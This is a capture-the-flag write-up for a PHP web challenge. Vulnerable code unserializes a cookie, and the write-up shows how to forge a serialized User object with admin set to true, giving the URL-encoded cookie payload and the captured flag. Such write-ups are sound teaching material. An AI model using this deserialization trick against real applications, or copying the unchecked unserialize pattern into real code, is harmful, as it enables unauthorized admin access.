Writeup: PEA 2019 - Educated guess

(Updated: )
writeups
, , , ,

Information

  • category: Web
  • points: 600

Description

There is a secured system running at http://shell1.2019.peactf.com:1428/query.php. You have obtained the source code.

Writeup

This is the content of source code’s file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<!doctype html>
<html>
<head>
    <title>Secured System</title>
</head>
<body>
<?php

// https://www.php-fig.org/psr/psr-4/

function autoload($class)
{
    include $class . '.class.php';
}

spl_autoload_register('autoload');

if (!empty($_COOKIE['user'])) {
    $user = unserialize($_COOKIE['user']);

    if ($user->is_admin()) {
        echo file_get_contents('../flag');
    } else {
        http_response_code(403);
        echo "Permission Denied";
    }
} else {
    echo "Not logged in.";
}
?>
</body>
</html>

From this source code filtering and semplifying the content will take us to this piece of code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php

// https://www.php-fig.org/psr/psr-4/

function autoload($class)
{
    include $class . '.class.php';
}

spl_autoload_register('autoload');

if (!empty($_COOKIE['user'])) {
    $user = unserialize($_COOKIE['user']);

    if ($user->is_admin()) {
        echo file_get_contents('../flag');
    } else {
        http_response_code(403);
        echo "Permission Denied";
    }
} else {
    echo "Not logged in.";
}
?>

Code explanation:

  • spl_autoload_register('autoload'): Register given function (in our case autoload function) as __autoload() implementation.
  • If the cookie called user is not empty then $user is the unserialized object written in the cookie
  • If $user->is_admin() returns true the flag is echoed

Solution:

  • In oop functions like is_admin() are called on objects of classes named like Profile, User..., so I created a simple User class (first “educated” guess)
    • Then I tried to find the class in the domain, success!
  • In oop functions like is_admin() usually returns boolean variables declared on the class scope, so I added to User class the boolean attribute admin set to true
  • Then serialize the object created and paste the serialized code in user cookie
  • Something doesn’t work…
    • It surely is because of this
    • So URL-encode the serialized object
  • Get the flag :3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php

class User{
    public $admin = true;
}

$a = new User();
$s = serialize($a);
echo $s;

?>

// Output: O:4:"User":1:{s:5:"admin";b:1;}

// URL-encoded: O%3A4%3A%22User%22%3A1%3A%7Bs%3A5%3A%22admin%22%3Bb%3A1%3B%7D

Flag

flag{peactf_follow_conventions_4022940cb27774f618aa62fe8be202bc}